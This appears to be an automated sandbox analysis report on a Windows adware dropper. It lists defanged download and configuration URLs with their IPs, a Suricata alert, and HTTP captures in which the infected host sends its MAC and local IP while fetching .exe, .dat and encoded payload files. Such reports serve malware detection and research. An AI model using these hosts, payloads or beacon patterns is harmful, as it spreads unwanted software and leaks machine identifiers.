Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.iojjek.com/down/20140504201222.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://www.iojjek.com/down/20140403140535.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://www.iojjek.com/down/20140404174727.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://www.iojjek.com/down/20131127183156.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://a1.p2ptool.com/txt/qtool.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=00533A1092B84F73B9CCC1AD91064DF3 42.159.80.192
hxxp://download.cpudln.com/12/ad22161.exe?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 174.37.172.71
hxxp://a1.p2ptool.com/txt/shock.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=83CAF3E7E328C4F1B414B0565546DA23 42.159.80.192
hxxp://www.iojjek.com/down/20140403140503.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://a1.p2ptool.com/txt/MiniIE.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=0CF4F544011329985BA796AD74A77901 42.159.80.192
hxxp://a1.p2ptool.com/txt/minie.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=BABC6CF351B7B2C4C859C12DFBD39277 42.159.80.192
hxxp://a1.p2ptool.com/txt/First.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=5D8AFFE78CF6342F0127A967DE092E0A 42.159.80.192
hxxp://a1.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 42.159.80.192
hxxp://1st.ecoma.glb0.lxdns.com/client/config.ini
hxxp://1st.ecoma.glb0.lxdns.com/attachments/advert/201405/20140505190815.ico
hxxp://download006.rdb.cnc.ccgslb.com.cn/getconfig/minisite.ini
hxxp://1st.ecoma.glb0.lxdns.com/attachments/advert/201405/20140505190854.ico
hxxp://1st.ecoma.glb0.lxdns.com/sh/index.html
hxxp://tt.woai310.com/client/config.ini 209.170.78.73
hxxp://site.minimenhu.com/sh/index.html 209.170.78.73
hxxp://get.woai310.com/getconfig/minisite.ini 221.194.130.5
hxxp://icon.woai310.com/attachments/advert/201405/20140505190854.ico 209.170.78.77
hxxp://icon.woai310.com/client/config.ini 209.170.78.77
hxxp://icon.woai310.com/attachments/advert/201405/20140505190815.ico 209.170.78.77
ad.zzinfor.cn


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN W32/Woai.Dropper Config Request

Traffic

GET /client/config.ini HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:29:59 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:09:53 GMT
ETag: "3f82de-167-4f8a52baea240"
Accept-Ranges: bytes
Content-Length: 359
Content-Type: text/plain
X-Via: 1.1 fra72:5 (Cdn Cache Server V2.0)
Connection: close
[AD192]..id=192..url=hXXp://p.ucwan87.net/s/1/1222/19865.html?uid=9050
30..reg=..name=................ico=hXXp://icon.woai310.com/attachments
/advert/201405/20140505190815.ico..[AD193]..id=193..url=hXXp://youxi.b
aidu.com/yxpm/pm.jsp?pid=101110070500236_2838257..reg=..name=.........
.ico=hXXp://icon.woai310.com/attachments/advert/201405/20140505190854.
ico..



GET /sh/index.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: site.minimenhu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:06 GMT
Server: nginx/1.4.4
Content-Type: text/html
Last-Modified: Mon, 05 May 2014 09:34:12 GMT
Transfer-Encoding: chunked
Content-Encoding: gzip
X-Via: 1.1 fra73:6 (Cdn Cache Server V2.0)
Connection: keep-alive
826.............YKo#..>s~E{.K...!.A....k.Q.^.^.6.X.M.9l.g.;....:.w8
@.\b$..<`..8....Z.... 9..!9..K...{..84..6.C.8.]..W..U...s....}.:.c.
..n.:...M...M.|..E...._..l.B.!.#.i.cf...u..y..4...1,.A.....#.d........
.o....m.1?r....JE).Q.[..G8..._$.c:p.f.s... ?yqtNF...U...0".y...ts.....
..o.^.s.`s......3.....P..3R..O.|R3....c.8z.D.......lZ........?~|r.....
~....>...{d<..Vt1.0h.|N.3&p..{H.G2..(.C..=.cF..!\......E....f.Q2
.....1.'...^3'.j..Ak.`^........b.u...a."...u.....d8.?....-6{..u...p..Q
.....1..."......^.G$...,&..7rY..n.y... .o.O...Q...5.........!.c.......
...s.....)...O?IC.Z..5Ex.....!l.@.."....?KC.Y..3E....R..]..;Ex..'..q(.
@([email protected].~...[i.........<|.v*.J..~)].....!.c.c.3.....'...\..
.............y.{o.....{.f.N...!..7?...?}...O.!........}..'.}zz.lP...4u
$7.xk.#=.........#[O.H.......C.. <....x.....C..{..1..}.jQ.-....l.?.
.0..{.E.G.!DzI..a.!m...kY.C...Ni.BQ.tt].6 .C$.6..a...e..1B...N....o:m"
L.[...Z...Y.)/.Ia......Y...R.[.4.[k....m].E..a.....o.bl...w.O}.j..1...
'.{.d/."..S/... ..^.Z.k...Q.KzK.".^i.[...9z.. ....];...u/.Cp.....,=3\q
.=o..N-.....i...s..u..2.....l~.S.......%[email protected]......].C<.
M.......\......I......&e...6~...........D..l...4.n......xq.6S...9.h[.D
f......q?.81..@....~.L;.B...q....L..fLL(...T....1....A'..#...(P.....dI
g.!\..(..}m..P.p..q.....D... .....%*7..f..kD_9A].N.<.........*.|U.~
......Z....!.D..9...1..7\.....7...\V.gg..c..7....^8.l..S...%(.......s.
..P;.......P..v..X..91...:[email protected].$.L.X..#.....1
a...!.q..6.w..i....\.....6! L.6.J.F3.b%.V.2....a.5.8*..c_...k.....
<<< skipped >>>


GET /client/config.ini HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: tt.woai310.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:19:47 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 10:47:43 GMT
ETag: "3d8761-19e-4f8a4dc6871c0"
Accept-Ranges: bytes
Content-Length: 414
Content-Type: text/plain
Age: 1
X-Via: 1.1 fra72:5 (Cdn Cache Server V2.0)
Connection: close
[u]..[AD452]..id=452..url=hXXp://t.xydhl.com/?eid=638aiOt+ay+fG8cY
0iRI3L+Pk3hy82KNMBAbzJRGCYPG..reg=..[AD454]..id=454..url=hXXp://nbtg
3.youyou234.com/?uid=913189..reg=..[AD455]..id=455..url=hXXp://VVV.myg
ame66.com/213700004.html..reg=..[AD458]..id=458..url=hXXp://num9998.7l
ianmeng.net/ ..reg=..[u]..name=705679..[AD282]..id=282..url=hXXp://tg.
dhelper001.com/goto/jump.php?source=158&aid=40..reg=..



GET /down/20140403140535.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 128924
Last-Modified: Thu, 03 Apr 2014 06:05:35 GMT
Connection: keep-alive
ETag: "533cfa2f-1f79c"
Accept-Ranges: bytes
D....m.7/6.h.>.=...~5...._........0;....".&.....}|.....e.../....t. 
..".Z...p>5.1.R.."...~1....P.v.).<..w..=....{...6...X........)..
....d....v:.x_|..m......!. .4.4...=RP0.7..Z...r....t....U... *........
P...*.b...m$q$%F..\..l..u.....vx..:.nu$..O...G..v.8.4......v..q.la....
Vr...7s.15X.....t.O-/.............x....U..c/[..7..9.R6.m9......F..n...
.V.r.:.1..I..,....Z........?T..|......4r.f.~...L..)7)..!3F..T]...Da...
...7..M.H.t....~E/(.Ac...M_.W.....~...7........j..X...j9.FM/...5..tB..
.H.{..o$ ..o.}....Z.....`.:7...Y.f.c@:3 ..9.-...O.w..yf..J..z.U...F.6.
..8....dq.nA..q.... ...9........E/..,{..?f...4.%.c..........P.....z...
....7....\.T.s.ZO.K.Fz.7=.-..........Dzw.tf...~.Y.K.b......Yn..H......
./.......:%.Y.u..R.(el$.*....v6.g...'.!....._.V..$....|....:....v...7.
6..$}......lyY......q..@./.m...r...(..`.........AD.....]z.t_..n...h'..
J....Em%y...g..J.4...o..........Y[VuF.XQ=o...)..M...p..%e....zg.i..B..
;..X.......\=..9...K<......d.h.'.....}..&.............^.n.1...n;b)$
".............^......6.....#.Jw%Aj.f..D...j......G!6...1.....L.....[..
......S......YH1..fjf%O=t....*.g..ez...C..2g.....@......../..Q...e....
Z._t...h*....T....OrI.......Q9..l..\F_........ .@.(F./."..|E?.l...6F@.
.n"....^$w..V/.Wem5..u0..P.~).vv.(u;3#E.e.w1...EL...H.M.3....g0U..x..:
.n.f...n.DT?1.g..e...`_8A.`.....r.$.z.z..........<...Q.#b......O..g
... .oVg..}'.O..?...  .X@[....]..X...I.!..#J.O.j.z.,....YM....)...shSo
[email protected]..'..!<.@...<..;".;.n.`....k.5f..g...R....
...,]`....6.!......|uz.i^Cyd.....\....`Q}I.s.Po..._.\_...}..J.....
<<< skipped >>>


GET /attachments/advert/201405/20140505190854.ico HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:03 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:08:54 GMT
ETag: "28d800a-25be-4f8a5282a5d80"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: image/x-icon
X-Via: 1.1 fra72:3 (Cdn Cache Server V2.0)
Connection: close
......00.... ..%......(...0...`..... ......$..........................
...............................................................Haf..24
... ......#'..HO.."%..]a..]c..qu.J....................................
......................................................................
.....................................,X]..............................
....................25..ej.Zno........................................
......................................................................
...............<.!.................................................
.................45..<>.,.......................................
......................................................................
..&...................................................................
.............! ..bc...................................................
...................................................?B.................
......................................................................
...oy.F...............................................................
......................................................................
...........................................................(..X.......
......................................................................
..........H...........................................................
.............................................cb.N.....................
...........................................................:>......
..................................................................
<<< skipped >>>


GET /txt/First.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=5D8AFFE78CF6342F0127A967DE092E0A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:18 GMT
Content-Type: text/plain
Content-Length: 55992
Last-Modified: Thu, 31 Oct 2013 07:46:57 GMT
Connection: close
ETag: "52720af1-dab8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnI3ntEYf13SVkvsJZ4XdxDrVLxACy9qsmmgVCdZFz
vgX20M2VmJYg rxTDHkczewCRJ1hJUEbkP2gsSZCTd 4FOg443QXXuBQY6T5iMX3zOegBi
79uobm5qxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB717iQq7OTl19OaA4pTXvaHKcH4udAK
rcqsrTAUDl3sdam7dtSK3XPhLaLi3q7GUvlycn0DaQTrXm/H8aJaRsqeb8fxolpGypqZSX
dMJEowytj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrfecpNLUfrs
qL/vBMfyAlccTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziEisc6R0/dQ3YsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ7q5904VxUrUsXZb10kL1hesTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAgWC/SF/A5XV0
Ykwt0Ip XE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oVCTa/ZEFhlLkQ4VQeWa3c81NbtSY9QqcGjbM i6KTv3tRbjrRTjzKzGrfbi VensS9J
GCL6q7dl1hmlDPyCnuXerh8XMC0Ao YBqQMrPzPY4f sO4iAG26fZ717XXkK05s6ah 21m
xj3tJilPoe7e8pLtN7U5XdNivRQ mLJE1O7GZumjZvlaLfu5eg4CLnn 01WkZ1U8IF
<<< skipped >>>


GET /down/20140403140503.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 146489
Last-Modified: Thu, 03 Apr 2014 06:05:04 GMT
Connection: keep-alive
ETag: "533cfa10-23c39"
Accept-Ranges: bytes
qMj\.O.7.T.0g..eJ'.&.z}..j$...$.....'.>.z..MF...M|.P`......i....^..
..L._..|[.C..q.*`[email protected]<...%.....n...(>.....2..Eu.W.N...v
....I.2.K.Z..<..q.T.pU........b]..4q!.o.h.t.z..;...VZ/...=...a...'.
w.`...].6.... -Bx.L.Y.6A......W.7.........^..=..3.....$.~'..0.........
.}0..A;..-..t...C6.}...i.....y........f<..7..2.S...l..c.kX..5q.....
..s....7S1...8..*/.....B...'.>..O..9.5J....o!....=Z...$.:.../.}..V.
.&..O.cX.0....K.5-;au.........3.C.m<..u..~.V...n.. yk0......".....X
K.l([email protected]~.c<.(....~.-.....IaEB..%......C.s..TPf."._BnLy.t.O....
..2\n..z.b3!w..5...../...J.....k..s...Hx."[iQ....o.jK.)w .....PVUK8}[j
i...Z.N19...A.... E..K."....\z:..\(a.Mv....j9._ .-.ot2..'..N..../...z.
..[......"...(.\4:...;....,).Q..3......Y.K..F/..Ag...........w........
.\7/....3er..Dh....^O.[..$0.....3....s...V....#..`....k2....L.E...#.7\
....Z...>F.<..."..@KL.&.;....#K0...Qk...^....s.z..qJ..SA|U.Q....
.5.)....._Y....!5|tGw].........%.. ...&...i......x.u..:.....1.,...&.m.
.......i...y.E...1.h...........=.....$...tC.....<NPe.....a<.3...
.*~..&,.e.............:.S$J.&M3.!......%L...6...9...&.r....@!....o....
............x.T=B.QJW.Ma.]H....D......7sk....i.......G[...-yB........3
It/.c..W..2. .A......O.`w..Z...'......!7n...Y..!F..?14c......)n.:....h
).^v..0Rn..[.....KY....U 8.^0..p9...OU;.1LQ.0....O....;;.[..0......._.
..j...kd.0.S.~.b.[.'B.`.k/.. z..uV...a.[X.N.O...F~.H..t..~.T...;R._zg3
...f7..-.......O.T..56C...........bp...x....b...h...X..}z8^....c.J..x0
....j...............f...'...rp.Y....0..>B.....Bw.r...).x......U
<<< skipped >>>


GET /down/20140504201222.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 762046
Last-Modified: Sun, 04 May 2014 12:12:23 GMT
Connection: keep-alive
ETag: "53662ea7-ba0be"
Accept-Ranges: bytes
..`W4`Ruq_.;.J.n!..-k.w.............,E..q.x....../C....F K.q$_..W.sD..
E.....`.Lb\q'[|.x. .....s.%..coC....f!.A.bPv.M..X..|t.0....g..p)}.,...
..B>[..I. .6';)-..ii.q'#"uW.L...&.Z.!..~Bf-...o.s...4../y.fK...'w.d
.....z...!..KY..A5e9..t[B.0.,...A....l}@c......\.....X...#.L..n./...KT
.h.b9..D'.....!.......[.....;o=2.........9...o\[email protected]]&@X-'..$
..|..... [email protected]/k..%P.`?..1K~.M.kH...x..I.x.. .....c....U$..3
2.)f~.........]'.7........^..........M..$.....o[....\.H...s~......VW3g
.n...pxj..=q.Bs...._.o.........c......t...e{........U...y...55....&D..
.D.\..9D..K...hBl .j...M...v3..$.$#k2.2.6j|.X.:...&o.=Qc.-...(&W.....M
 _......1....4...TP..?..w.T.i.,m..2..P..D{.N.T....5.]......%..mq......
.z.....w......P....m..r.C.fg.....C....<..U/.Q...!).M...p.....i....H
........C..Y!..P7.I...,...a.9\...lC.D......vG.)..|.{H'"..2Y..h...O../&
lt;oX.M]..k"...v8.g..p6/.....6.,i.w.9..k..QA.(..)iRs...s.O.].".3(.O...
.........m......../...hYN..R.$1..).Vv~.i.q....{.P'5.Z.....a7.. ..d..H.
<../.~iC.. .h.3Z.....0..]......?.'.H.`...Z.^.....s...j..7..ie......
y.b...........?H.#c....e....s.....[?P.H.-.z.Z...cO.E6.)X.=`E.... .....
....X.3H.7"...o. w..x..kj..5.....D#.!v.i#..*....S_......=.$..1.D......
....l......5..f.k....1..U .UX.....wF..D.\..>j....p$oS.D..h....3R...
{...C..f...nYw.i..[..!....vF".)..0^f*.PHG..E..K...K?Z1~..u~.F..d-.<
|...wl........o.#`^...V.{.D.9...<z......U.....V..f.....]F..=x.5....
....s.j......O5...4=.mgT..uq.*.....C....~..>....U."(....*Z../.v...$
..W...w....jl.......c{0...0y.2:..^t...|u..1b?.#%P..U..k.=..J<.@
<<< skipped >>>


GET /txt/minie.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=BABC6CF351B7B2C4C859C12DFBD39277 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:17 GMT
Content-Type: text/plain
Content-Length: 552288
Last-Modified: Thu, 17 Apr 2014 07:17:37 GMT
Connection: close
ETag: "534f8011-86d60"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKjEM/P7VSUkIYTUcGBy2FRC69p6kVkATlPn WKha
 p6mLJe9YFjcg9nuyZte/2TbGFcNnJ91uh0PfRH1ExkBHVqd1/r2cPqCiD5giKQdfMHD66
jLvKSMlRvQmJSadR2n3Vk/YAGJcwV XizD15bgLX7qdeHg7EomncBFjKkwnCIsTazQ2ZSP
lrxNrNDZlI WstAut164t3QfHudIJIr smfTmgOKU172hbZTlKVOmWE3pn6q7sUWNyE5ex
r0XB8pgwv8NfP4RCFZcnJ9A2kE615vx/GiWkbKnm/H8aJaRsqd271Qtjsj1BrY LTgBilB
frDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a0m0lxXHFYJ4Xc5x1SSJqkDE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a0zzJiZ/
/c4hfivhh9p0ZFGLGKZPpXit78TazQ2ZSPlrVxHHzkU4nwsZ/mTGsYxWe0LkLId ZuYAX7
fEDC5dHRfE2s0NmUj5axJGIauKgU68P0ady7illlgKt4zBzmW5N8zf2QXrcyOGxNrNDZlI
 WtwtiPSWquUIsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0 FHM2uc4
0vb0DYWs9eRZyinW89vxTB12DE/jA70gQ0qTwji9/vboXA0GVkOD1EPp8tRR/tRJlxLr0O
RgCIWWdcT3siEntPeUrTAtU5sq1E N1wm0UTmfGU 1RGVQa9wXIsMN9Et8T3gJ7dLjTRWH
28N35hb5zqcCrXkdyIKyarHsAxIq1gYYnBhrakrmIqNItl8Rxg5V XKISZZR39k7Se
<<< skipped >>>


GET /txt/qtool.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=00533A1092B84F73B9CCC1AD91064DF3 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 207544
Last-Modified: Fri, 14 Mar 2014 03:05:39 GMT
Connection: close
ETag: "53227203-32ab8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnLqo60gvePDkoHM9DbJe7Tjh4 nH2bP9aFCSwjYHR
4l 7UwqvSEOhNXHppTDLj119TWXeJh3IJ9esBiFPqijxoprj91UOh3kmU26coaV4mme /Y
nyMwF8msX7gSTAatirUd/BfXQBNlpsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3
dB1yL7Y0rVPJSM IdytADpRZZQpdrfS4c3NsJHySq6XNHZfI3JbHxSfuN3zViD8BTVlycn
0DaQTrWJvgEYtUqAbYm ARi1SoBtv503yyV8YI5tDvmh0eAJpOsMaJudVXlW6wxom51VeV
ZRJhvIVRruRMTazQ2ZSPlrfG3yIDZT/NrQRADa8IaeW8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrmXxDh0CbFt/E2s0NmUj5a8
TazQ2ZSPlrRgCXvWcoIV/E2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziGfgG2kySe5BYsYpk l
eK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7Zl0rhN6noR2szABXdb4xacTazQ2ZSPlrEk
Yhq4qBTrw/Rp3LuKWWWFmpUjgoGpwtrpDmPV/qCfrE2s0NmUj5a3C2I9Jaq5QixNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0 IwuSEW9
tTzkexR8iciydRaOzkEh5NbtgkIKp2UrgNyxOobQe2 p/t2Eck12VQqJInk6kovpOlrKsW
W3dvX2r4NjjBj1CRSFuMRJcgAFXGKYy1 eIv0GjvJRuME adz1uJdAhTPxjooDQWaox01y
uknv10PbZLRO1BQWTcFX/iEwhWJM5PjkByvM0g97rP1diCYBrSyRSnea4uowziO3 1
<<< skipped >>>


GET /txt/MiniIE.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=0CF4F544011329985BA796AD74A77901 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 362944
Last-Modified: Wed, 23 Oct 2013 18:15:53 GMT
Connection: close
ETag: "52681259-589c0"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnL9ivEpOxIvWUuMNHYejBwLx/iGNmRaI76IgyeZ6C
xPIylB3W6W1RAethCXJxn4TIhUbQEG nqE535kAcjU9543oC4gIS6EJvWgUgmdm 4w0urM
26Q/DN7lXgm77d3uSvCPa6WJ3dP 0  PozyOOWpOPs3PDEnI5GjE2s0NmUj5ay0C63Xri3
dBz1syS B8g2WM IdytADpRQFyAP 7ylSmTt3g1muGFuQInCnYYBlTg7qpn0PjnRKslycn
0DaQTrWJvgEYtUqAbYm ARi1SoBtsxFne7vrIgWphWzKJDKM5esMaJudVXlW6wxom51VeV
